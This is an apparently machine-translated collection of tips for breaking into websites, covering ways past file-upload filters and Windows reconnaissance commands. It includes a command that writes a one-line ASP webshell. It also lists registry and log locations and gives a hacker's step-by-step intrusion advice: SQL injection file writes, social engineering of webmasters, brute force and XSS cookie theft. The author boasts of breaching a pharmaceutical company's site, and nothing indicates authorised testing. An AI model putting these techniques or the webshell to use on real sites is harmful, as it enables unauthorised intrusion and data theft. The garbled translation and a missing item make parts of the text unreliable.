Web penetration testing experience and skills (all)

Nuclear'atkSorted:

Upload Vulnerability shell:

1. directly upload ASP. Asa. jsp. Cer. php. aspx. htr. CDX .... And get the shell.
2. Adding spaces or a few points after the suffix during uploading may be surprising. Example: *. asp, *. asp...
3. Use the dual extension for upload, for example, *. jpg. Asa format (which can also be used with the 2.1 extension ).
4.gif File Header Spoofing
5. Duplicate upload with the same name is also very OK. :

Commands used in intrusion penetration, Syntax:

Set, systeminfo, ipconfig, Ping. You can use these commands to receive more system information.
Tasklist/svc view the PID of the service
Netstat-ano, netstat-abnv
Fsutil.exe fsinfo drives list all drive letters
Dir D: \ * conn *. */s find the database connection file
Telnet 218.25.88.234 3389 indicates whether the port is open to the outside.
Echo ^ <% execute (Request ("cmd") % ^> E: \ K \ x. asp write a sentence to the E: \ K \ directory, and the password is cmd.
Type D: \ wwwroot \ WEB \ k6.asp> D: \ wwwroot \ 123 \. ASP transfers k6.asp under D: \ wwwroot \ WEB \ To D: \ wwwroot \ 123 \ and renames it as. ASP

Registry sensitive information:

HKEY_LOCAL_MACHINE \ SOFTWARE \ MySQL AB \ mysql registry location
HKEY_LOCAL_MACHINE \ SOFTWARE \ hzhost \ config \ Huazhong host location
HKEY_LOCAL_MACHINE \ SOFTWARE \ Cat Soft \ Serv-U location
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WDS \ rdpwd \ TDS \ Tcp \ portnamber port 3389
HKEY_LOCAL_MACHINE \ SYSTEM \ controlset001 \ Services \ Tcpip \ Parameters 1433 Port
HKEY_LOCAL_MACHINE \ SYSTEM \ controlset001 \ Services \ msftpsvc \ Parameters \ virtual roots \ Server FTP path

Physical path of the server log file:

Security log file: % SystemRoot % \ system32 \ config \ secevent. EVT
System log file: % SystemRoot % \ system32 \ config \ sysevent. EVT
ApplicationProgramLog File: % SystemRoot % \ system32 \ config \ appevent. EVT
FTP connection log and httpd transaction log: SystemRoot % \ system32 \ logfiles \. The following sub-folders are available for FTP and Web Service logs respectively. The suffix is. log.
Norton AntiVirus log: C: \ Documents ents and Settings \ All Users \ Application Data \ symantec

Oldjun Big bull's experience in website intrusion:

Next we will talk about the experience of personal intrusion, regardless of language. We will only talk about webshell. As for elevation of permission, I will not mention it here, and I will rarely raise the right unless it is really necessary !~

1. no matter what station, no matter what language, I want to penetrate, the first thing is to scan the directory, it is best to scan an upload point, directly upload the shell, don't laugh, sometimes it takes you a long time to build a website and finally find a ready-made upload point, which is easy to guess. However, this situation occurs mostly in ASP!

2. ASP (aspx) + MSSQL first considers injection. Generally, injection has the dbowner permission to directly write the shell. If it cannot be written, or the web is separated from the database, guess the data, start from the background. You can upload or modify the configuration file in the background;

3. ASP (aspx) + Access has only three methods to use shell. One is the frontend upload or injection into the background upload, and the other is the injection into the background to change the configuration file; third, after being injected into the back-end backup database or the storm database, I knew that the ASP or ASA database was used, so I wrote a sentence directly;

4. PHP + MySQL is usually injected into the background for upload. Occasionally, if you are lucky enough to have high permissions, You can inject select into OUTFILE. Then, it can be included locally and remotely. Remote inclusion is not supported by PHP in the later version, so I tried to upload an image file locally or write it to the log. Then, PHP program has some undisclosed vulnerabilities. If you are lucky, you can write the shell directly.

5. JSP + MySQL uses the database to obtain permissions basically the same as PHP, and JSP upload rarely checks the file suffix, so as long as there are injection points and the background, shell is quite easy. I have not met many sites in JSP + Oracle, but I also tried to guess the user name and password from the background.

6. no matter what the station, the main site is generally very safe (otherwise it will be played early), so generally starting from the second-level domain name, guess some of the main site's user names and passwords or get to the main siteSource code, Or get Cain or ARP after the same network segment server.

7. generally, a large site rarely uses a ready-made CMS, so if you are lucky enough to find the source code, you will launch the injection vulnerability, upload vulnerability, and file Write Vulnerability, all in your hands. Let's take a look at the new test sites from those major sites. Those sites are still being tested and can be easily won.

8. there is a file name Truncation in the upload, which includes two aspects: one is 00 truncation, the other is long file name truncation (we used this to get HW); then there are a lot of file writing places, it can be 00, which has been tried and tested repeatedly. Do not forget to upload the. ASP Directory (of course. Asa,. CER,. CDX.

9. the PHP site has magic_quotes_gpc problems in both Windows and Linux. When magic_quotes_gpc is on, you can still select into OUTFILE when injecting server variables, this is the case when I started a non-open-source CMS this year. Generally, don't consider writing files for on. But if you have this permission, don't forget to read the file source code, because the load_file parameter can be encoded.

Surprise.

11. the use of tools is very important. WVS scanning before the intrusion will help the intrusion. Although there are many injection tools, it is not necessarily good. Today's hard and soft firewalls and anti-injection tools are getting worse and worse, at that time, you should not be lazy. More manual work will help you grow.

12. Have you ever encountered any first-class monitoring or other post-protection firewalls? Sometimes you can't upload a trojan when you go in one sentence. At that time, you should first learn the encoding and then learn to change and bypass it.

13. if you want to make a general website, remember to check the copyright of the website, find the company that is the website, and start from other websites of the company. Then, get the source code and go back to it, I used this method to win a well-known pharmaceutical company site.

14. the concept of bypass is never out of date. When dbowner is injected, shell can be easily written to the site you need, saving you trouble in Elevation of Privilege. If you're lucky, step-by-Step shell authorization to get what you need.

15. never forget about social engineering. Using social engineering to treat yourself as a person with nothing, start with QQ, ID card, email, and so on of XX Webmaster. Sometimes there may be exceptions; in addition, do not forget the simple attempt of admin, admin; Test, test; 123456,123456. Of course, you can also perform brute force cracking.

16. Do not ignore XSS. Do not ignore cookies. XSS can steal cookies. You can learn how to use them. Cookies can be forged and logged on, cookies can be injected, and cookies can be injected around the vast majority of firewalls.

17. we usually collect a lot of paths, source code, tools, and enrich our "weapons" database. We recommend you record your intrusion steps or review them afterwards, I usually keep it in txt, and I also want to do the opposite.

18. Learn more, read the source code, and read the published 0day. The script is the prerequisite for intrusion, rather than the tool. You will use the tool to install B.